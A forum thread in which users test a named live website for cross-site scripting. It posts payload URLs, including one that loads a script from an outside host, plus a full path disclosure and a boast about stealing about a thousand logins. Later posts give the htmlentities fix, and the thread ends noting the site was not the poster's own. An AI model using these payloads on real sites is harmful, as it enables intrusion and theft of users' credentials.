Jump to content

hack this...


phpSensei

Recommended Posts

Cross Site Scripting:

http://www.theinsomniaxe.com/hoast/index.php/"><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if the filename contains code.

 

Cross Site Scripting:

There is Cross Site Scripting in the image upload.

 

Full Path Disclosure:

Warning: array_sum(): The argument should be an array in /var/www/vhosts/theinsomniaxe.com/httpdocs/hoast/index.php on line 150
Link to comment
Share on other sites

even with that XSS you cant do anything.

 

seriously show me one that would ruin my site. NOTHING!!!

 

Your wish is my command:

 

http://www.theinsomniaxe.com/hoast/index.php/%22%3E%3Cscript%20type='text/javascript'%20src='http://sandbox.guahanweb.com/scripts/hack.js'%3E%3C/script%3E

 

For me to be able to include a javascript file from my server is insanely dangerous. I could make your site look like anything I wanted it to. What's more, I wouldn't necessarily have to change the functionality of it, I could just add a couple form fields and have the data sent to me instead of you. There are many more dangers to leaving your site open than just having your server hacked.

Link to comment
Share on other sites

even with that XSS you cant do anything.

 

seriously show me one that would ruin my site. NOTHING!!!

 

Your wish is my command:

 

http://www.theinsomniaxe.com/hoast/index.php/%22%3E%3Cscript%20type='text/javascript'%20src='http://sandbox.guahanweb.com/scripts/hack.js'%3E%3C/script%3E

 

For me to be able to include a javascript file from my server is insanely dangerous. I could make your site look like anything I wanted it to. What's more, I wouldn't necessarily have to change the functionality of it, I could just add a couple form fields and have the data sent to me instead of you. There are many more dangers to leaving your site open than just having your server hacked.

Actually you are making it sound rather tame. It can much more dangerous then that. When a pretty short line of code in the wrong place, you could potentially get the username and password of everybody that goes to that page (if you store login data in cookies).

 

I did this once on a site purely as a learning experience to see if I could do it. Got like a thousand usernames/passwords in the few hours I had it on there =O

 

And it doesn't matter if the passwords are hashed, either; you can decrypt them with a rainbow.

 

Exploits like this are very real and very dangerous. And they can be solved by just writing ONE SINGLE WORD INTO YOUR PHP SCRIPT; htmlentities

Link to comment
Share on other sites

I mean you just put htmlentities there.

 

Like instead of echo $_GET['input'];

You would put echo htmlentities($_GET['input']);

 

That's really all you need to do to make this kind of attack virtually impossible.

Link to comment
Share on other sites

Oh didnt know that, and in that case, the xss is made from right after index.php like this one, there is no  $_GET really right ? How can you fix it?

 

Sorry I dont wanna bum someone else post but since we're on it :P

Link to comment
Share on other sites

Oh didnt know that, and in that case, the xss is made from right after index.php like this one, there is no  $_GET really right ? How can you fix it?

 

Sorry I dont wanna bum someone else post but since we're on it :P

I'm not sure what you're trying to ask, sorry.

 

Just use htmlentities on any user-submitted info you output in PHP and you'll be fine.

Link to comment
Share on other sites

This wasnt even my site, I just wanted to see what professionals can do with XSS... :D

 

Then, your post was in direct violation of the forum guidelines. You are not to be posting sites that are not your own for the purpose of having them "tested."

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.